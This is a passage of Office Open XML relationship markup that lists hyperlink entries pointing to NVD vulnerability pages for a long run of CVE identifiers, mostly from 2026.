TargetMode="External" Id="rId3795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73067" TargetMode="External" Id="rId3796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId3797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId3798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId3799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9176" TargetMode="External" Id="rId3800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11363" TargetMode="External" Id="rId3801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14505" TargetMode="External" Id="rId3802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19201" TargetMode="External" Id="rId3803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45819" TargetMode="External" Id="rId3804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId3805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55569" TargetMode="External" Id="rId3806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId3807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70593" TargetMode="External" Id="rId3808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70602" TargetMode="External" Id="rId3809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73433" TargetMode="External" Id="rId3810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId3811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId3812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81051" TargetMode="External" Id="rId3813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84898" TargetMode="External" Id="rId3814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-9355" TargetMode="External" Id="rId3815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70340" TargetMode="External" Id="rId3816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11496" TargetMode="External" Id="rId3817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12757" TargetMode="External" Id="rId3818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14470" TargetMode="External" Id="rId3819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14975" TargetMode="External" Id="rId3820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15154" TargetMode="External" Id="rId3821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16637" TargetMode="External" Id="rId3822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17259" TargetMode="External" Id="rId3823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17273" TargetMode="External" Id="rId3824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17443" TargetMode="External" Id="rId3825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17444" TargetMode="External" Id="rId3826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId3827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17622" TargetMode="External" Id="rId3828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17631" TargetMode="External" Id="rId3829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId3830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18076" TargetMode="External" Id="rId3831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18078" TargetMode="External" Id="rId3832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18744" TargetMode="External" Id="rId3833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18887" TargetMode="External" Id="rId3834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19127" TargetMode="External" Id="rId3835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19299" TargetMode="External" Id="rId3836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19301" TargetMode="External" Id="rId3837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19302" TargetMode="External" Id="rId3838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19645" TargetMode="External" Id="rId3839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19778" TargetMode="External" Id="rId3840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19840" TargetMode="External" Id="rId3841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19855" TargetMode="External" Id="rId3842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19859" TargetMode="External" Id="rId3843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2340" TargetMode="External" Id="rId3844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2377" TargetMode="External" Id="rId3845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27145" TargetMode="External" Id="rId3846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33217" TargetMode="External" Id="rId3847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34836" TargetMode="External" Id="rId3848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34949" TargetMode="External" Id="rId3849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37009" TargetMode="External" Id="rId3850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38343" TargetMode="External" Id="rId3851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38345" TargetMode="External" Id="rId3852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41607" TargetMode="External" Id="rId3853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42041" TargetMode="External" Id="rId3854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42965" TargetMode="External" Id="rId3855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId3856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45377" TargetMode="External" Id="rId3857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46370" TargetMode="External" Id="rId3858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46371" TargetMode="External" Id="rId3859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47127" TargetMode="External" Id="rId3860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47226" TargetMode="External" Id="rId3861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47227" TargetMode="External" Id="rId3862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47230" TargetMode="External" Id="rId3863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47233" TargetMode="External" Id="rId3864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48075" TargetMode="External" Id="rId3865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48076" TargetMode="External" Id="rId3866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48083" TargetMode="External" Id="rId3867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48093" TargetMode="External" Id="rId3868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48786" TargetMode="External" Id="rId3869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49455" TargetMode="External" Id="rId3870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49466" TargetMode="External" Id="rId3871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49976" TargetMode="External" Id="rId3872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52371" TargetMode="External" Id="rId3873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52731" TargetMode="External" Id="rId3874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52733" TargetMode="External" Id="rId3875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52763" TargetMode="External" Id="rId3876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53524" TargetMode="External" Id="rId3877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53583" TargetMode="External" Id="rId3878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53586" TargetMode="External" Id="rId3879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId3880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53769" TargetMode="External" Id="rId3881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53959" TargetMode="External" Id="rId3882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54054" TargetMode="External" Id="rId3883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54622" TargetMode="External" Id="rId3884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54624" TargetMode="External" Id="rId3885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54732" TargetMode="External" Id="rId3886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54738" TargetMode="External" Id="rId3887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54740" TargetMode="External" Id="rId3888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55221" TargetMode="External" Id="rId3889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId3890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55497" TargetMode="External" Id="rId3891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55531" TargetMode="External" Id="rId3892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55545" TargetMode="External" Id="rId3893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55549" TargetMode="External" Id="rId3894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55588" TargetMode="External" Id="rId3895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55593" TargetMode="External" Id="rId3896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55618" TargetMode="External" Id="rId3897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55855" TargetMode="External" Id="rId3898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56818" TargetMode="External" Id="rId3899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57822" TargetMode="External" Id="rId3900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId3901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59903" TargetMode="External" Id="rId3902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61688" TargetMode="External" Id="rId3903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61690" TargetMode="External" Id="rId3904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61802" TargetMode="External" Id="rId3905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61842" TargetMode="External" Id="rId3906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62326" TargetMode="External" Id="rId3907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId3908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId3909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId3910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63117" TargetMode="External" Id="rId3911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63123" TargetMode="External" Id="rId3912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63133" TargetMode="External" Id="rId3913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId3914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63667" TargetMode="External" Id="rId3915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63669" TargetMode="External" Id="rId3916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64662" TargetMode="External" Id="rId3917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64663" TargetMode="External" Id="rId3918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId3919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65976" TargetMode="External" Id="rId3920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId3921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId3922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId3923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66632" TargetMode="External" Id="rId3924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId3925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId3926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId3927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId3928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId3929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId3930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId3931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId3932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId3933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId3934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId3935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId3936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId3937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId3938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68501" TargetMode="External" Id="rId3939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68516" TargetMode="External" Id="rId3940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68555" TargetMode="External" Id="rId3941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68559" TargetMode="External" Id="rId3942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId3943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId3944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId3945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId3946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId3947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId3948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId3949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId3950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68901" TargetMode="External" Id="rId3951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68930" TargetMode="External" Id="rId3952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69245" TargetMode="External" Id="rId3953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId3954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId3955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId3956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId3957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId3958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId3959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 